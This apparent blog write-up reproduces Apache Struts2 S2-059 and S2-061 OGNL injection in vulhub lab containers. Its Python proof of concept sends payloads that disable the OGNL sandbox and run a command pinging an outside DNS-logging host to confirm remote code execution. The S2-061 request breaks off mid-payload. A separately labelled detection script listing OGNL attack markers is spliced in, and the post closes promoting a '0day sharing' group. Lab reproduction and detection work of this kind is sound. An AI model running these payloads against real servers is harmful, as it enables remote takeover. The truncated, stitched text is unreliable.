Struts2 S2-059 and S2-061 Vulnerability Reproduction
Struts2 S2-059
First, set up the lab environment:
```
git clone https://github.com/vulhub/vulhub.git
cd vulhub/struts2/s2-059
docker-compose up -d
# Switching the Docker registry mirror is recommended; the NetEase mirror is a good choice
# http://hub-mirror.c.163.com
```
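Open the application page in a browser.
Now the PoC (the one from the official site gives no visible output).
Remember to change the IP and DNS address below; the DNS callback domain comes from https://dnslog.io/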
```
import requests

# vulhub lab instance started above; change the IP if the lab runs elsewhere
url = "http://127.0.0.1:8080"
data1 = {
    "id": "%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}"
}
# replace ??.dnslog.io with your own dnslog.io subdomain
data2 = {
    "id": "%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('ping ??.dnslog.io'))}"
}
res1 = requests.post(url, data=data1)
res2 = requests.post(url, data=data2)
```
OK, that works.
Struts2 S2-061
The link on the official site, https://vulhub.org/#/environments/struts2/s2-061/, does not behave properly.
It is better to just read vulhub/struts2/s2-061/Readme.zh-cn.md instead.
```
cd vulhub/struts2/s2-061
docker-compose up -d
```
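Capture the request in Burp Suite and send it to Repeater. Remember to change the IP and DNS address below; the DNS callback domain comes from https://dnslog.io/
Now the PoC: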
```
POST /index.action HTTP/1.1
Host:
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 790

------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name="id"

%{('Powered_by_Unicode_Potats0,enjoy_it').(
------WebKitFormBoundaryl7d1B1aGsV2wcZwF--
```
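A detection-side companion to the two requests above, added here as an example (it is not code from the original post or from vulhub): it URL-decodes a request body, including double-encoded input, and flags the OGNL markers that appear in this page's payloads. The marker names, function names, verdict labels and sample bodies are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Markers drawn from the two payloads on this page; illustrative, not exhaustive.
OGNL_MARKERS = {
    "expression_wrapper": re.compile(r"[%$]\{"),
    "value_stack_access": re.compile(r"#attr\s*\[\s*['\"]struts\.valueStack", re.I),
    "container_lookup": re.compile(r"xwork2\.ActionContext\.container", re.I),
    "sandbox_reset": re.compile(
        r"setExcluded(Classes|PackageNames)|setMemberAccess|DEFAULT_MEMBER_ACCESS", re.I),
    "static_method_call": re.compile(r"@[\w.$]+@\w+\s*\("),
}

# Constructed sample bodies (harmless fragments, not full payloads).
BENIGN = "id=12345&email=alice%40example.com"
TEMPLATE_TEXT = "comment=total+is+${amount}"
ENCODED = "id=%25%7B%28%23context%3D%23attr%5B%27struts.valueStack%27%5D.context%29%7D"
DOUBLE_ENCODED = "id=%2525%257B%2528%2523context.setMemberAccess%2528x%2529%2529%257D"


def normalise(value, max_rounds=3):
    """URL-decode repeatedly so single- and double-encoded input compares equal."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_body(body):
    """Return the sorted names of the OGNL markers found in a request body."""
    text = normalise(body)
    return sorted(name for name, rx in OGNL_MARKERS.items() if rx.search(text))


def classify(body):
    """block: wrapper plus another marker; review: any single marker; else allow."""
    hits = scan_body(body)
    if "expression_wrapper" in hits and len(hits) > 1:
        return "block"
    return "review" if hits else "allow"


if __name__ == "__main__":
    for sample in (BENIGN, TEMPLATE_TEXT, ENCODED, DOUBLE_ENCODED):
        print(classify(sample), scan_body(sample))
```

A lone `${` or `%{` is only marked for review because ordinary template text can contain it; the verdict escalates when the wrapper appears together with value-stack, container or member-access markers.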
Picked up another new tool along the way; remember to bookmark dnslog.io.
Recommended: 阿乐你好
Lab: vulhub
Planet group: 网络安全0day共享库